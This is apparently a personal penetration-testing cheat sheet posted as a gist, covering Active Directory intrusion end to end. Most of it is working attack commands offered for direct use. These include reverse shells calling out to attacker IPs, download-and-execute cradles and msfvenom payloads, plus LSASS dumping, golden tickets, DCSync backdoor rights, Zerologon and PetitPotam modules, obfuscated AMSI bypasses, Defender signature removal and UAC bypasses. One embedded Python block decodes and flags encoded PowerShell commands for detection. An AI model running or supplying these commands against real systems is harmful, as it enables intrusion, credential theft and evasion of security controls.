@curtishoughton
Last active January 9, 2025 21:52

Process

1) Nessus

Start Nessus running against all in-scope hosts.

Check out-of-scope hosts and make sure they're not scanned!

2) Nmap Scans

Full TCP

nmap -sC -sV -Pn -vv -p- -oA full-tcp-nmap -iL hosts

UDP

nmap -sC -sV -Pn -vv --top-ports 100 -oA udp-top-100 -iL hosts

3) Metasploit

Setting up listener

use exploit/multi/handler
set PAYLOAD <payload>
set EXITFUNC <exitfunc>

Socks Proxy

use auxiliary/server/socks_proxy
set SRVHOST 127.0.0.1
run

Autoroute

use post/multi/manage/autoroute
set SESSION <id>
set SUBNET <SUBNET>
set NETMASK <NETMASK>
show options
run
route

Execute DotNet Assembly - Seatbelt Example

use post/windows/manage/execute_dotnet_assembly
set DOTNET_EXE /mnt/share/seatbelt.exe
set ARGUMENTS -group=all
set session <number>
run

4) Initial Enumeration

Powerview

# Get all users in the current domain
Get-DomainUser | select -ExpandProperty cn

# Get all computers in the current domain
Get-DomainComputer

# Get all domains in current forest
Get-ForestDomain

# Get domain/forest trusts
Get-DomainTrust
Get-ForestTrust

# Get information for the DA group
Get-DomainGroup "Domain Admins"

# Find members of the DA group
Get-DomainGroupMember "Domain Admins" | select -ExpandProperty membername

# Find interesting shares in the domain, ignore default shares, and check access
Find-DomainShare -ExcludeStandard -ExcludePrint -ExcludeIPC -CheckShareAccess

# Get OUs for current domain
Get-DomainOU -FullData

# Get computers in an OU
# %{} is a looping statement
Get-DomainOU -name Servers | %{ Get-DomainComputer -SearchBase $_.distinguishedname } | select dnshostname

# Get GPOs applied to a specific OU
Get-DomainOU *WS* | select gplink
Get-DomainGPO -Name "{3E04167E-C2B6-4A9A-8FB7-C811158DC97C}"

# Get Restricted Groups set via GPOs, look for interesting group memberships forced via domain
Get-DomainGPOLocalGroup -ResolveMembersToSIDs | select GPODisplayName, GroupName, GroupMemberOf, GroupMembers

# Get the computers where users are part of a local group through a GPO restricted group
Get-DomainGPOUserLocalGroupMapping -LocalGroup Administrators | select ObjectName, GPODisplayName, ContainerName, ComputerName

# Find principals that can create new GPOs in the domain
Get-DomainObjectAcl -SearchBase "CN=Policies,CN=System,DC=targetdomain,DC=com" -ResolveGUIDs | ?{ $_.ObjectAceType -eq "Group-Policy-Container" } | select ObjectDN, ActiveDirectoryRights, SecurityIdentifier

# Find principals that can link GPOs to OUs
Get-DomainOU | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ObjectAceType -eq "GP-Link" -and $_.ActiveDirectoryRights -match "WriteProperty" } | select ObjectDN, SecurityIdentifier

# Get incoming ACL for a specific object
Get-DomainObjectAcl -SamAccountName "Domain Admins" -ResolveGUIDs | Select IdentityReference,ActiveDirectoryRights

# Find interesting ACLs for the entire domain, show in a readable (left-to-right) format
Find-InterestingDomainAcl | select identityreferencename,activedirectoryrights,acetype,objectdn | ?{$_.IdentityReferenceName -NotContains "DnsAdmins"} | ft

# Get interesting outgoing ACLs for a specific user or group
# ?{} is a filter statement
Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReference -match "Domain Admins"} | select ObjectDN,ActiveDirectoryRights

Enable Restricted Admin Mode for RDP Access (ADMIN NEEDED; the value is named DisableRestrictedAdmin, so 0 turns the mode on)

reg add "hklm\system\currentcontrolset\control\lsa" /f /v DisableRestrictedAdmin /t REG_DWORD /d 0

Add DCsync Rights to Specific User

Add-ObjectACL -TargetDistinguishedName "dc=targetdomain,dc=com" -PrincipalSamAccountName BackdoorUser -Rights DCSync

Lateral Movement

# Find existing local admin access for user (noisy 🚩)
Find-LocalAdminAccess

# Hunt for sessions of interesting users on machines where you have access (also noisy 🚩)
Find-DomainUserLocation -CheckAccess | ?{$_.LocalAdmin -Eq True }

# Look for kerberoastable users
Get-DomainUser -SPN | select name,serviceprincipalname

# Look for AS-REP roastable users
Get-DomainUser -PreauthNotRequired | select name

# Look for interesting ACL within the domain, filtering on a specific user or group you have compromised
## Exploitation depends on the identified ACL, some techniques are discussed in this cheat sheet
## Example for GenericWrite on user: Disable preauth or add SPN for targeted kerberoast (see below)
Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "UserOrGroupToQuery"}

# Look for servers with Unconstrained Delegation enabled
## If available and you have admin privs on this server, get user TGT (see below)
Get-DomainComputer -Unconstrained

# Look for users or computers with Constrained Delegation enabled
## If available and you have user/computer hash, access service machine as DA (see below)
Get-DomainUser -TrustedToAuth | select userprincipalname,msds-allowedtodelegateto
Get-DomainComputer -TrustedToAuth | select name,msds-allowedtodelegateto

AppLocker Policy (PowerShell AppLocker module)

Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
Get-AppLockerPolicy -Domain -LDAP "LDAP://targetdomain.com/CN={16641EA1-8DD3-4B33-A17F-9F259805B8FF},CN=Policies,CN=System,DC=targetdomain,DC=com"  | select -expandproperty RuleCollections

Generic Windows

sysinfo

Enable Powershell Remoting

wget https://raw.githubusercontent.com/samratashok/nishang/master/Backdoors/Set-RemotePSRemoting.ps1 -O psremote.ps1

# Give user PowerShell Remoting access to a machine
Set-RemotePSRemoting -UserName BackdoorUser -ComputerName dc.targetdomain.com

Generating Meterpreter Shells

x86 Reverse Shell

sudo msfvenom -a x86 -p windows/meterpreter/reverse_https LHOST=192.168.49.65 LPORT=443 EXITFUNC=thread -f csharp

x64 Reverse Shell

sudo msfvenom -p windows/x64/meterpreter/reverse_https -a x64 LHOST=10.10.10.4 LPORT=443 EXITFUNC=thread -f ps1

RPCCLIENT

Authenticated

rpcclient -U "<domain>\<username>" <IP>

Anonymous

rpcclient -N -U "" <IP>

GetDomainSID Anon

rpcclient $> lsaquery

Impacket

WMI Exec

# with password
impacket-wmiexec DOMAIN/targetuser:<password>@<IP>

# with hash
impacket-wmiexec DOMAIN/<user>@<IP> -hashes :e0e223d63905f5a7796fb1006e7dc594

# with Kerberos authentication (make sure your client is set up to use the right ticket, and that you have a TGS with the right SPNs)
impacket-wmiexec DOMAIN/<user>@<IP> -no-pass -k

KERBEROAST

python GetUserSPNs.py <domain_name>/<domain_user>:<domain_user_password> -outputfile <output_TGSs_file>

GetTGT

# Request the TGT with hash
python getTGT.py <domain_name>/<user_name> -hashes [lm_hash]:<ntlm_hash>

# Request the TGT with aesKey (stronger encryption, and probably stealthier since AES is what Microsoft uses by default)
python getTGT.py <domain_name>/<user_name> -aesKey <aes_key>

# Request the TGT with password
python getTGT.py <domain_name>/<user_name>:[password]

# If no password is provided, you are prompted for it

# Set the TGT for impacket use
export KRB5CCNAME=<TGT_ccache_file>

# Execute remote commands with any of the following by using the TGT
python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

Golden Ticket

# To generate the TGT with NTLM
python ticketer.py -nthash <krbtgt_ntlm_hash> -domain-sid <domain_sid> -domain <domain_name>  <user_name>

# To generate the TGT with AES key
python ticketer.py -aesKey <aes_key> -domain-sid <domain_sid> -domain <domain_name>  <user_name>

# Set the ticket for impacket use
export KRB5CCNAME=<TGS_ccache_file>

# Execute remote commands with any of the following by using the TGT
python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

Mimikatz

Generate Golden Ticket

Kerberos::golden /user:Administrator /service:krbtgt /domain:currentdomain.com /sid:S-1-5-21-1874506631-3219952063-538504511 /target:targetdomain.com /rc4:fe8884bf222153ca57468996c9b348e9 /ticket:ticket.kirbi

Pass The Ticket

# Collect tickets

sekurlsa::tickets /export

# Inject ticket

kerberos::ptt <.kirbi file>

# spawn CMD with the injected ticket

misc::cmd

Bloodhound

https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors

# Run all checks, including restricted groups enforced through the domain  🚩
Invoke-BloodHound -CollectionMethod All,GPOLocalGroup

# Running LoggedOn separately sometimes gives you more sessions, but enumerates by looping through hosts so is VERY noisy 🚩
Invoke-BloodHound -CollectionMethod LoggedOn

CrackMapExec

Credential Spray List of Targets

poetry run crackmapexec smb /home/kali/Documents/Training/OSEP/OSEP_Exam/targets.txt -u username -p password

WinRM Run Command

poetry run crackmapexec winrm 172.16.65.92 -u jim -p fSgdaws536Dfa -x "powershell -exec bypass -enc <encoded_command>"

Dump LSASS Remotely

poetry run crackmapexec smb <IP> -u <username> -p <password> --lsa

NoPAC

poetry run crackmapexec smb <IP> -u '' -p '' -M nopac

ioxidresolver - Get IPv4 and IPv6

poetry run crackmapexec smb <IP> -u '' -p '' -M ioxidresolver

PetitPotam

poetry run crackmapexec smb <IP> -u '' -p '' -M petitpotam

Zerologon

poetry run crackmapexec smb <IP> -u '' -p '' -M zerologon

SharpKatz

DCSync By Username

SharpKatz.exe --Command dcsync --User user --Domain userdomain --DomainController dc

LSASSY

Dump LSASS Remotely

lsassy -d test.lab -u <username> -p <password> <IP>

PyPykatz

pypykatz live lsa --method handledup

Rubeus

# Request a TGT as the target user and pass it into the current session
# NOTE: Make sure to clear tickets in the current session (with 'klist purge') to ensure you don't have multiple active TGTs
.\Rubeus.exe asktgt /user:Administrator /rc4:[NTLMHASH] /ptt

# More stealthy variant, but requires the AES256 key (see 'Dumping OS credentials with Mimikatz' section)
.\Rubeus.exe asktgt /user:Administrator /aes256:[AES256KEY] /opsec /ptt

# Pass the ticket to a sacrificial hidden process, allowing you to e.g. steal the token from this process (requires elevation)
.\Rubeus.exe asktgt /user:Administrator /rc4:[NTLMHASH] /createnetonly:C:\Windows\System32\cmd.exe
.\Rubeus.exe asktgs /ticket:c:\ad\tools\eucorp-tgt.kirbi /service:CIFS/eurocorp-dc.eurocorp.local /dc:eurocorp-dc.eurocorp.local /ptt

PTT

# Collect tickets

.\Rubeus.exe dump

# Inject ticket

.\Rubeus.exe ptt /ticket:<.kirbi file>

TGT

.\Rubeus.exe asktgt /domain:<domain_name> /user:<user_name> /rc4:<ntlm_hash> /ptt

# Execute a cmd in the remote machine
.\PsExec.exe -accepteula \\<remote_hostname> cmd

Kerbrute

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

SharpGPOAbuse

https://github.com/FSecureLABS/SharpGPOAbuse

SharpGPOAbuse.exe --AddComputerTask --TaskName "Microsoft LEGITIMATE Hotfix" --Author "NT AUTHORITY\SYSTEM" --Command "cmd.exe" --Arguments "/c start calc.exe" --GPOName "Totally Legit GPO"

Powershell

Convert to Encoded Command (Linux)

# -n keeps echo's trailing newline out of the encoded payload
echo -n "iex(command)" | iconv --to-code UTF-16LE | base64 -w 0

Powershell Load Remote Script

powershell IEX(New-Object Net.WebClient).DownloadString('http://<IPAddress>:<Port>/PowershellScript.ps1')

Non-Proxy Aware Load Script

$h=new-object -com WinHttp.WinHttpRequest.5.1;$h.open('GET','http://10.10.16.7/PowerView.obs.ps1',$false);$h.send();iex $h.responseText

Powershell Encoded Command

$text = "(New-Object System.Net.WebClient).DownloadString('http://192.168.49.65/run.txt') | IEX"
$bytes = [System.Text.Encoding]::Unicode.GetBytes($text)
$EncodedText = [Convert]::ToBase64String($bytes)
$EncodedText


Run Encoded Command

powershell -exec bypass -enc <EncodedText>
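The UTF-16LE + base64 transform that `-enc` expects is easy to reverse. As an added example that is not part of this gist, the Python below decodes `-EncodedCommand` arguments out of process-creation command lines (restoring stripped padding and rejecting arguments that are not UTF-16LE) and flags the DownloadString | IEX cradle the sheet encodes above. The sample command lines and the SUSPICIOUS list are constructed for the example.

```python
import base64
import binascii
import re

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc ...).
# This regex approximates that and skips -ex... (ExecutionPolicy) and -ep.
ENC_ARG = re.compile(r"(?i)(?:^|\s)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]+)")

# Substrings a detection engineer would flag inside a decoded command (constructed
# list); the DownloadString | IEX cradle is the one the cheat sheet itself encodes.
SUSPICIOUS = ("DownloadString", "IEX", "Invoke-Expression", "Net.WebClient",
              "FromBase64String", "amsiInitFailed")


def encode_command(cmd):
    """Same transform as 'iconv --to-code UTF-16LE | base64 -w 0' or
    [Text.Encoding]::Unicode.GetBytes + [Convert]::ToBase64String."""
    return base64.b64encode(cmd.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(b64):
    """Return the decoded command, or None if the argument is not UTF-16LE base64."""
    padded = b64 + "=" * (-len(b64) % 4)  # trailing '=' is often stripped; restore it
    try:
        raw = base64.b64decode(padded, validate=True)
    except binascii.Error:
        return None
    try:
        return raw.decode("utf-16-le")
    except UnicodeDecodeError:  # odd byte count or not UTF-16 at all
        return None


def analyze_cmdline(cmdline):
    """Extract and decode the encoded argument from one process command line."""
    m = ENC_ARG.search(cmdline)
    if not m:
        return None
    decoded = decode_encoded_command(m.group(1))
    flagged = decoded is not None and any(s.lower() in decoded.lower() for s in SUSPICIOUS)
    return {"encoded": m.group(1), "decoded": decoded, "suspicious": flagged}


def scan(cmdlines):
    """Run analyze_cmdline over a batch of process-creation command lines."""
    return [analyze_cmdline(c) for c in cmdlines]


# Constructed sample command lines (not real log data). The first re-encodes the
# download cradle the cheat sheet converts with [Text.Encoding]::Unicode.
SAMPLE_CMDLINES = [
    "powershell -exec bypass -enc " + encode_command(
        "(New-Object System.Net.WebClient).DownloadString('http://192.168.49.65/run.txt') | IEX"),
    "powershell.exe -NoP -NonI -W Hidden -e " + encode_command("Get-Date").rstrip("="),
    "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
    "powershell -enc QUJD",  # valid base64 ("ABC") but 3 bytes, so not UTF-16LE
]

if __name__ == "__main__":
    for line, result in zip(SAMPLE_CMDLINES, scan(SAMPLE_CMDLINES)):
        print(line[:50], "->", result)
```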

Reverse TCP Shell one line

$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Reverse TCP one line

powershell -NoP -NonI -W Hidden -Exec Bypass -Command $client = New-Object System.Net.Sockets.TCPClient("10.0.0.1",4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Defender Remove Signatures

MpCmdRun.exe -RemoveDefinitions -All

AMSI Bypass

[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
sET-ItEM ( 'V'+'aR' +  'IA' + 'blE:1q2'  + 'uZx'  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    GeT-VariaBle  ( "1Q2U"  +"zX"  )  -VaL )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System'  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f'amsi','d','InitFaile'  ),(  "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )
[Delegate]::CreateDelegate(("Func``3[String, $(([String].Assembly.GetType('System.Reflection.Bindin'+'gFlags')).FullName), System.Reflection.FieldInfo]" -as [String].Assembly.GetType('System.T'+'ype')), [Object]([Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')),('GetFie'+'ld')).Invoke('amsiInitFailed',(('Non'+'Public,Static') -as [String].Assembly.GetType('System.Reflection.Bindin'+'gFlags'))).SetValue($null,$True)

Load C# Assembly Reflectively

$data = (New-Object System.Net.WebClient).DownloadData('http://10.10.16.7/rev.exe')
$assem = [System.Reflection.Assembly]::Load($data)
[rev.Program]::Main()

# Download and run Rubeus, with arguments (make sure to split the args)
$data = (New-Object System.Net.WebClient).DownloadData('http://10.10.16.7/Rubeus.exe')
$assem = [System.Reflection.Assembly]::Load($data)
[Rubeus.Program]::Main("s4u /user:web01$ /rc4:1d77f43d9604e79e5626c6905705801e /impersonateuser:administrator /msdsspn:cifs/file01 /ptt".Split())

# Execute a specific method from an assembly (e.g. a DLL)
$data = (New-Object System.Net.WebClient).DownloadData('http://10.10.16.7/lib.dll')
$assem = [System.Reflection.Assembly]::Load($data)
$class = $assem.GetType("ClassLibrary1.Class1")
$method = $class.GetMethod("runner")
$method.Invoke(0, $null)

Constrained Language Mode

$ExecutionContext.SessionState.LanguageMode
&{whoami}

Identify LAPS

https://github.com/leoloobeek/LAPSToolkit/blob/master/LAPSToolkit.ps1

# Get computers running LAPS, along with their passwords if we're allowed to read those
Get-LAPSComputers

# Get groups allowed to read LAPS passwords
Find-LAPSDelegatedGroups

Powershell Port Scanner

Single Threaded

# Define the target IP/hostname and ports to scan
$Target = "192.168.1.1"  # Replace with the target IP or hostname
$Ports = 1..1024         # Ports to scan (adjust as needed)

# Function to check if a port is open
function Test-Port {
    param (
        [string]$Target,
        [int]$Port
    )
    try {
        $TcpClient = New-Object System.Net.Sockets.TcpClient
        $TcpClient.Connect($Target, $Port)
        $TcpClient.Close()
        return $true
    } catch {
        return $false
    }
}

# Scan the ports
foreach ($Port in $Ports) {
    if (Test-Port -Target $Target -Port $Port) {
        Write-Host "Port $Port is open" -ForegroundColor Green
    } else {
        Write-Host "Port $Port is closed" -ForegroundColor Red
    }
}

Multi Threaded

# Define the target IP/hostname and ports to scan
$Target = "127.0.0.1"  # Replace with the target IP or hostname
$Ports = 1..1024         # Ports to scan (adjust as needed)
$MaxThreads = 50         # Number of threads to run in parallel

# Create a RunspacePool to handle parallel execution
$RunspacePool = [runspacefactory]::CreateRunspacePool(1, $MaxThreads)
$RunspacePool.Open()

# Collection to store runspaces
$Runspaces = @()

# Queue one runspace per port; each runspace attempts a TCP connect and emits a line if it succeeds
foreach ($Port in $Ports) {
    $Runspace = [powershell]::Create().AddScript({
        param ($Target, $Port)
        try {
            $TcpClient = New-Object System.Net.Sockets.TcpClient
            $TcpClient.Connect($Target, $Port)
            $TcpClient.Close()
            Write-Output "Port $Port is open"
        } catch {
            # Uncomment the next line if you want to see closed ports
            #Write-Output "Port $Port is closed"
        }
    }).AddArgument($Target).AddArgument($Port)
    
    $Runspace.RunspacePool = $RunspacePool
    $Runspaces += [PSCustomObject]@{
        Pipe   = $Runspace
        Status = $Runspace.BeginInvoke()
    }
}

# Wait for all threads to complete
$Runspaces | ForEach-Object {
    $_.Pipe.EndInvoke($_.Status)
    $_.Pipe.Dispose()
}

# Close the RunspacePool
$RunspacePool.Close()
$RunspacePool.Dispose()

C# in PowerShell, Multi-Threaded (prints open ports in green)

# C# code for multi-threaded port scanner
Add-Type -TypeDefinition @"
using System;
using System.Net.Sockets;
using System.Threading;

public class PortScanner {
    public static void Scan(string target, int startPort, int endPort, int maxThreads) {
        SemaphoreSlim semaphore = new SemaphoreSlim(maxThreads);
        for (int port = startPort; port <= endPort; port++) {
            semaphore.Wait();
            int currentPort = port; // Avoid closure issue
            ThreadPool.QueueUserWorkItem((state) => {
                try {
                    using (TcpClient client = new TcpClient()) {
                        client.Connect(target, currentPort);
                        Console.ForegroundColor = ConsoleColor.Green;
                        Console.WriteLine("Port " + currentPort + " is open");
                        Console.ResetColor();
                    }
                } catch {
                   //Console.ForegroundColor = ConsoleColor.Red;
                   //Console.WriteLine("Port " + currentPort + " is closed");
                   //Console.ResetColor();
                } finally {
                    semaphore.Release();
                }
            });
        }
        // Wait for all threads to finish
        while (semaphore.CurrentCount < maxThreads) {
            Thread.Sleep(100);
        }
    }
}
"@

# Define the target and port range
$Target = "127.0.0.1"  # Replace with your target IP or hostname
$StartPort = 1           # Starting port
$EndPort = 1024          # Ending port
$MaxThreads = 50         # Maximum number of threads

# Run the port scanner
[PortScanner]::Scan($Target, $StartPort, $EndPort, $MaxThreads)

Linux Reverse Shell

Bash

bash -i >& /dev/tcp/10.0.0.1/4242 0>&1

0<&196;exec 196<>/dev/tcp/10.0.0.1/4242; sh <&196 >&196 2>&196

/bin/bash -l > /dev/tcp/10.0.0.1/4242 0<&1 2>&1

Python ipv4

export RHOST="10.0.0.1";export RPORT=4242;python -c 'import socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'

Python IPv6

python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::125c",4242,0,2));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'

Netcat Linux

nc -e /bin/sh 10.0.0.1 4242
nc -e /bin/bash 10.0.0.1 4242
nc -c bash 10.0.0.1 4242

UAC Bypass

SharpBypassUAC

# Generate EncodedCommand
echo -n 'cmd /c start rundll32 c:\\users\\public\\beacon.dll,Update' | base64

# Use SharpBypassUAC e.g. from a CobaltStrike beacon
execute-assembly /opt/SharpBypassUAC/SharpBypassUAC.exe -b eventvwr -e Y21kIC9jIHN0YXJ0IHJ1bmRsbDMyIGM6XHVzZXJzXHB1YmxpY1xiZWFjb24uZGxsLFVwZGF0ZQ==

Fodhelper

# The command to execute in high integrity context
$cmd = "cmd /c start powershell.exe"
 
# Set the registry values
New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force
New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force
Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value $cmd -Force
 
# Trigger fodhelper to perform the bypass
Start-Process "C:\Windows\System32\fodhelper.exe" -WindowStyle Hidden
 
# Clean registry
Start-Sleep 3
Remove-Item "HKCU:\Software\Classes\ms-settings\" -Recurse -Force